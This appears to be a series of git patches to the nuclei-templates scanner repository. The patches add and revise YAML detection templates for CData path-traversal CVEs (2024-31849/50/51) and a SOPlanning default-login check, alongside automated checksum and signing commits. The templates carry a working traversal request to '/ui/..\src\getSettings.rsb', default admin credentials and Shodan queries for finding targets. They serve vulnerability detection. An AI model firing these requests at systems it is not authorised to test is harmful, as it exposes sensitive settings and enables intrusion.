"{{BaseURL}}/ui/..\src\getSettings.rsb?@json" + - '{{BaseURL}}/login.rst' + + matchers: + - type: word + internal: true + words: + - 'CData - API Server' + + - raw: + - | + GET /ui/..\src\getSettings.rsb?@json HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}} matchers-condition: and matchers: - type: word part: body words: - - "smtppassword" - - "nopassword" - condition: and + - '"items":[{' + - ':"true"' + - 'notifyemail' + condition: and + + - type: word + part: header + words: + - 'application/json' - type: status status: From a06902523ec95b5b354171662b676870ab05ec8d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 8 May 2024 11:47:11 +0530 Subject: [PATCH 0687/1768] Create CVE-2024-31850.yaml --- http/cves/2024/CVE-2024-31850.yaml | 61 ++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31850.yaml diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml new file mode 100644 index 0000000000..c8740b87a1 --- /dev/null +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -0,0 +1,61 @@ +id: CVE-2024-31850 + +info: + name: CData Arc < 23.4.8839 - Path Traversal + author: DhiyaneshDK + severity: high + description: | + A path traversal vulnerability exists in the Java version of CData Arc < 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions. + reference: + - https://www.tenable.com/security/research/tra-2024-09 + - https://nvd.nist.gov/vuln/detail/CVE-2024-31850 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-31850 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.09773 + metadata: + verified: true + max-request: 1 + shodan-query: title:"CData Arc" + tags: cve,cve2024,cdata,lfi + +flow: http(1) && http(2) + +http: + - method: GET + path: + - '{{BaseURL}}/login.rst' + + matchers: + - type: word + internal: true + words: + - 'CData Arc' + + - raw: + - | + GET /ui/..\src\getSettings.rsb?@json HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"items":[{' + - ':"true"' + - 'notifyemail' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From f8e7320d696480518bfea3787f3fee4e64551512 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 8 May 2024 11:51:40 +0530 Subject: [PATCH 0688/1768] Create CVE-2024-31851.yaml --- http/cves/2024/CVE-2024-31851.yaml | 61 ++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 http/cves/2024/CVE-2024-31851.yaml diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml new file mode 100644 index 0000000000..e596255440 --- /dev/null +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -0,0 +1,61 @@ +id: CVE-2024-31851 + +info: + name: CData Sync < 23.4.8843 - Path Traversal + author: DhiyaneshDK + severity: high + description: | + A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions. + reference: + - https://www.tenable.com/security/research/tra-2024-09 + - https://nvd.nist.gov/vuln/detail/CVE-2024-31851 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 8.6 + cve-id: CVE-2024-31851 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.09773 + metadata: + verified: true + max-request: 1 + shodan-query: title:"CData Sync" + tags: cve,cve2024,cdata,lfi + +flow: http(1) && http(2) + +http: + - method: GET + path: + - '{{BaseURL}}/login.rst' + + matchers: + - type: word + internal: true + words: + - '<title>CData - Sync' + + - raw: + - | + GET /ui/..\src\getSettings.rsb?@json HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"items":[{' + - ':"true"' + - 'notifyemail' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From d378d5e6afa04bbb635b8746b4903e9ad9ae0b6b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 06:25:18 +0000 Subject: [PATCH 0689/1768] Auto Generated New Template Addition List [Wed May 8 06:25:18 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 9dadc165f9..61ab6c271b 100644 --- a/.new-additions +++ b/.new-additions @@ -28,6 +28,8 @@ http/cves/2024/CVE-2024-2876.yaml http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml +http/cves/2024/CVE-2024-31850.yaml +http/cves/2024/CVE-2024-31851.yaml http/cves/2024/CVE-2024-32399.yaml http/cves/2024/CVE-2024-32640.yaml http/cves/2024/CVE-2024-4040.yaml From beefaaba46cfab6a4152876cbf931f8f31d6031b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 06:25:35 +0000 Subject: [PATCH 0691/1768] Auto Generated Templates Checksum [Wed May 8 06:25:35 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ce5cc32e8b..94f96df3f9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,8 +3274,10 @@ http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b +http/cves/2024/CVE-2024-31850.yaml:2f422bfe565c1cfaf29192958c786ace1349ca0e +http/cves/2024/CVE-2024-31851.yaml:b63e9c3a0d4fdf1af55927a0a19422a2afa52b5a http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 -http/cves/2024/CVE-2024-32640.yaml:8860384a27158bf684d2da9680a25c88e74188f5 +http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 @@ -8484,7 +8486,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5e84eef4388bcc9bf901398a808b7b4a961a7948 +templates-checksum.txt:43a408efbf48ab76f1fea279cf67df72dc6eeb86 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5ec43b67bd73ca76add8c3e2fbc57e905b6ee327 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 06:26:01 +0000 Subject: [PATCH 0692/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0f5389d880..eeab7c63ac 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -33,6 +33,8 @@ on: - 'http/cves/2024/CVE-2024-3136.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' + - 'http/cves/2024/CVE-2024-31850.yaml' + - 'http/cves/2024/CVE-2024-31851.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' - 'http/cves/2024/CVE-2024-32640.yaml' - 'http/cves/2024/CVE-2024-4040.yaml' From cc0a6844ff5e81720dbe41ffd139c8778ba07527 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 8 May 2024 11:57:06 +0530 Subject: [PATCH 0693/1768] Update soplanning-default-login.yaml --- .../soplanning/soplanning-default-login.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index a1387595a4..1cea63f856 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -9,11 +9,11 @@ info: reference: - https://www.soplanning.org/en/ metadata: + verified: true + max-request: 1 vendor: soplanning product: soplanning shodan-query: html:"soplanning" - verified: true - max-request: 1 tags: soplanning,default-login http: @@ -32,7 +32,8 @@ http: password: - admin - redirects: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From a2a63fcc46a7c7b573e1fb104fb19c3fd538873d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 06:27:19 +0000 Subject: [PATCH 0694/1768] Auto Template Signing [Wed May 8 06:27:19 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31851.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml index e596255440..e057749cbf 100644 --- a/http/cves/2024/CVE-2024-31851.yaml +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -59,3 +59,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100842e24cc880d77226e1303cecc992eba04ec11f26e0a04b9dda1a8e79668d748022100bf52bffb2d81f6061330180b33406e553b52f778bc07ebb4365d98c249849ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1727bee217642bd7beca70e3e76b0e54b67d7433 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 8 May 2024 11:57:23 +0530 Subject: [PATCH 0695/1768] Flow Update --- http/cves/2024/CVE-2024-31849.yaml | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index a06173e8a8..af627a67e4 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -1,11 +1,11 @@ id: CVE-2024-31849 info: - name: CData API Server < 23.4.8844 - Path Traversal + name: CData Connect < 23.4.8846 - Path Traversal author: DhiyaneshDK severity: critical description: | - A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. + A path traversal vulnerability exists in the Java version of CData Connect < 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application. reference: - https://www.tenable.com/security/research/tra-2024-09 - https://www.cdata.com/kb/entries/jetty-cve-0324.rst @@ -20,10 +20,22 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"CData" + shodan-query: title:"CData Connect" tags: cve,cve2024,cdata,lfi +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}/login.rst' + + matchers: + - type: word + internal: true + words: + - 'CData - Connect' + - raw: - | GET /ui/..\src\getSettings.rsb?@json HTTP/1.1 @@ -48,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203fd50be1fcb931f42ea5bd6a0cd03d98f5a8eed134374d6988f80cc1fcb95ff802200a1b9c40d7c51f44193a0674840be4e38fdcd3feca29712ccffaf4aa7b77c240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fd50be1fcb931f42ea5bd6a0cd03d98f5a8eed134374d6988f80cc1fcb95ff802200a1b9c40d7c51f44193a0674840be4e38fdcd3feca29712ccffaf4aa7b77c240:922c64590222798bb761d5b6d8e72950 From 2328f53a50cf4175049125c80c9560fa185b9b5e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 06:30:03 +0000 Subject: [PATCH 0696/1768] Auto Generated New Template Addition List [Wed May 8 06:30:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 61ab6c271b..c8e2b84b7c 100644 --- a/.new-additions +++ b/.new-additions @@ -36,6 +36,7 @@ http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml http/default-logins/crushftp/crushftp-default-login.yaml +http/default-logins/soplanning/soplanning-default-login.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml From 9c54a9b2f2395eb59091147669fb25e46336b9c4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 06:30:09 +0000 Subject: [PATCH 0697/1768] Auto Generated Templates Checksum [Wed May 8 06:30:09 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 94f96df3f9..904a54d5be 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3275,7 +3275,7 @@ http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-31850.yaml:2f422bfe565c1cfaf29192958c786ace1349ca0e -http/cves/2024/CVE-2024-31851.yaml:b63e9c3a0d4fdf1af55927a0a19422a2afa52b5a +http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 @@ -3436,6 +3436,7 @@ http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3 http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 +http/default-logins/soplanning/soplanning-default-login.yaml:69e6c5ca20fc8aa38d0eb8bfb195c0daf04589fc http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7 http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40 http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c @@ -8486,7 +8487,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:43a408efbf48ab76f1fea279cf67df72dc6eeb86 +templates-checksum.txt:e9b47726d9fec4cc1469958e948df96cddc74dd4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae3179e213331555b10745824dd8b8d17252a054 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 06:30:43 +0000 Subject: [PATCH 0699/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index eeab7c63ac..3270589a6d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - 'http/default-logins/crushftp/crushftp-default-login.yaml' + - 'http/default-logins/soplanning/soplanning-default-login.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' From d62c1e31e9a7fe8cbbafd62d34bd08623d61e4e8 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 06:30:55 +0000 Subject: [PATCH 0700/1768] Auto Generated Templates Checksum [Wed May 8 06:30:55 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 904a54d5be..3762807b6b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,7 +3273,7 @@ http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 -http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b +http/cves/2024/CVE-2024-31849.yaml:578b66b6ff4296a28215971e56f0896c24eedd00 http/cves/2024/CVE-2024-31850.yaml:2f422bfe565c1cfaf29192958c786ace1349ca0e http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 @@ -8487,7 +8487,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e9b47726d9fec4cc1469958e948df96cddc74dd4 +templates-checksum.txt:b3313279ef134e78fe94c37b7c546ef13a5cd806 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a21800f4dc0f93d790f2dd2162140408943d7b59 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 06:31:53 +0000 Subject: [PATCH 0701/1768] Auto Template Signing [Wed May 8 06:31:53 UTC 2024] :robot: --- http/cves/2024/CVE-2024-31850.yaml | 1 + http/default-logins/soplanning/soplanning-default-login.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index c8740b87a1..dee808c0be 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -59,3 +59,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a90aacad9d50c7b4f889f1ea7226b29388df438d5644c28822dc4a2715f9490502200ea6c2b15395f98c3499bf87ddb3dea4f98de351105b8418254967fc47e7c3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index 1cea63f856..817121268f 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100b3d86e9e10bde636e6ff84016fd5241457bcac181d4c2b3192a646880f744dc902205cb3645bb990dc1492bf69406d5d8bdf9cfb6c1f2673f843d980c65713f09a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0a2f66bc41b5afd69530811efa41f9d53c568be4 Mon Sep 17 00:00:00 2001 From: lu4nx <lx@shellcodes.org> Date: Wed, 8 May 2024 16:51:34 +0800 Subject: [PATCH 0702/1768] Add ksyun WAF --- dns/dns-waf-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 05aaa5c995..74bf75b1b9 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -193,4 +193,10 @@ dns: words: - ".iidns.com" + - type: word + part: answer + name: ksyun + words: + - ".ksyunwaf.com" + # digest: 4a0a0047304502200a845666375d02a84b9b0a1b56465d375357774b8c0c3a044dccf1e02fbf6267022100bf5e4f34f8e41d1cf13880ed6760c273df09e408a6d0c53c335dceeadac76182:922c64590222798bb761d5b6d8e72950 From 257bef9660264ef4a3828d31b8c75eb429cf0c4f Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 8 May 2024 14:33:42 +0530 Subject: [PATCH 0703/1768] Update and rename ms-exchange-local-domain.yaml to ms-exchange-local-domain.yaml --- .../microsoft}/ms-exchange-local-domain.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) rename http/{exposures/configs => misconfiguration/microsoft}/ms-exchange-local-domain.yaml (71%) diff --git a/http/exposures/configs/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml similarity index 71% rename from http/exposures/configs/ms-exchange-local-domain.yaml rename to http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 7480a96b15..67bee944cd 100644 --- a/http/exposures/configs/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -3,19 +3,23 @@ id: ms-exchange-local-domain info: name: Microsoft Exchange Autodiscover - Local Domain Exposure author: userdehghani - severity: medium + severity: info description: | Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cwe-id: CWE-200 + impact: | + An attacker can leverage this information for reconnaissance and targeted attacks. + remediation: | + Restrict access to the Autodiscover service or configure it to not expose local domain information. reference: - https://support.microsoft.com/en-gb/topic/autodiscover-v2-returns-internalurl-not-externalurls-in-other-site-774301e2-2d1e-d5e0-aa41-a49f6e9b06f4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + cwe-id: CWE-200 metadata: verified: true max-request: 1 shodan-query: http.title:outlook exchange - tags: microsoft,ms-exchange,ad,dc + tags: misconfig, microsoft,ms-exchange,ad,dc http: - method: GET From d8e99edfaf7e28fe24be21fbf4d39e2d48950086 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 8 May 2024 14:35:33 +0530 Subject: [PATCH 0704/1768] Update ms-exchange-local-domain.yaml --- http/misconfiguration/microsoft/ms-exchange-local-domain.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 67bee944cd..9a52bdceba 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -3,7 +3,7 @@ id: ms-exchange-local-domain info: name: Microsoft Exchange Autodiscover - Local Domain Exposure author: userdehghani - severity: info + severity: low description: | Microsoft Exchange is prone to a local domain exposure using the Autodiscover v2 endpoint. impact: | From c2d56c6386c1f10f564a53d01c7b335115b1b4af Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 8 May 2024 14:39:16 +0530 Subject: [PATCH 0705/1768] Delete profiles/exposedfiles.yml --- profiles/exposedfiles.yml | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 profiles/exposedfiles.yml diff --git a/profiles/exposedfiles.yml b/profiles/exposedfiles.yml deleted file mode 100644 index 968b20a8a6..0000000000 --- a/profiles/exposedfiles.yml +++ /dev/null @@ -1,9 +0,0 @@ -# This is a configuration file for the exposed files template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt - -templates: - - http/exposures/ \ No newline at end of file From 34fbb9228b1e779b10768ca04598ace612c62fc8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 8 May 2024 14:39:29 +0530 Subject: [PATCH 0706/1768] Delete profiles/exposedpanels.yml --- profiles/exposedpanels.yml | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 profiles/exposedpanels.yml diff --git a/profiles/exposedpanels.yml b/profiles/exposedpanels.yml deleted file mode 100644 index a3fffdc33e..0000000000 --- a/profiles/exposedpanels.yml +++ /dev/null @@ -1,9 +0,0 @@ -# This is a configuration file for the exposed panels template profile. -# Additional configuration profiles can be created for different types of nuclei scans. -# They should be placed under the 'config' directory at: -# https://github.com/projectdiscovery/nuclei-templates -# Here is an example of how to use a config profile: -# nuclei -config config/osint.yml -list target_list_to_scan.txt - -templates: - - http/exposed-panels/ \ No newline at end of file From 72691d499b9d85db944c7fecf5cb1aaba02a7e02 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 8 May 2024 14:42:30 +0530 Subject: [PATCH 0707/1768] Rename subdomaintakeovers.yml to subdomain-takeovers.yml --- profiles/{subdomaintakeovers.yml => subdomain-takeovers.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename profiles/{subdomaintakeovers.yml => subdomain-takeovers.yml} (92%) diff --git a/profiles/subdomaintakeovers.yml b/profiles/subdomain-takeovers.yml similarity index 92% rename from profiles/subdomaintakeovers.yml rename to profiles/subdomain-takeovers.yml index 06d420b133..5591c8551b 100644 --- a/profiles/subdomaintakeovers.yml +++ b/profiles/subdomain-takeovers.yml @@ -8,4 +8,4 @@ templates: - http/takeovers/ - dns/azure-takeover-detection.yaml - - dns/elasticbeanstalk-takeover.yaml \ No newline at end of file + - dns/elasticbeanstalk-takeover.yaml From 519637a7d17879889c3072e2efd0d866938112fd Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 8 May 2024 10:09:21 +0000 Subject: [PATCH 0708/1768] Auto Generated New Template Addition List [Wed May 8 10:09:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c8e2b84b7c..45c2193824 100644 --- a/.new-additions +++ b/.new-additions @@ -32,6 +32,7 @@ http/cves/2024/CVE-2024-31850.yaml http/cves/2024/CVE-2024-31851.yaml http/cves/2024/CVE-2024-32399.yaml http/cves/2024/CVE-2024-32640.yaml +http/cves/2024/CVE-2024-33575.yaml http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml From b2e9dc8e7f1e6b4618334505104ee3340f2efdd6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 8 May 2024 10:09:32 +0000 Subject: [PATCH 0709/1768] Auto Generated Templates Checksum [Wed May 8 10:09:32 UTC 2024] :robot: --- templates-checksum.txt | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3762807b6b..b57a48b55a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3274,11 +3274,12 @@ http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:578b66b6ff4296a28215971e56f0896c24eedd00 -http/cves/2024/CVE-2024-31850.yaml:2f422bfe565c1cfaf29192958c786ace1349ca0e +http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf 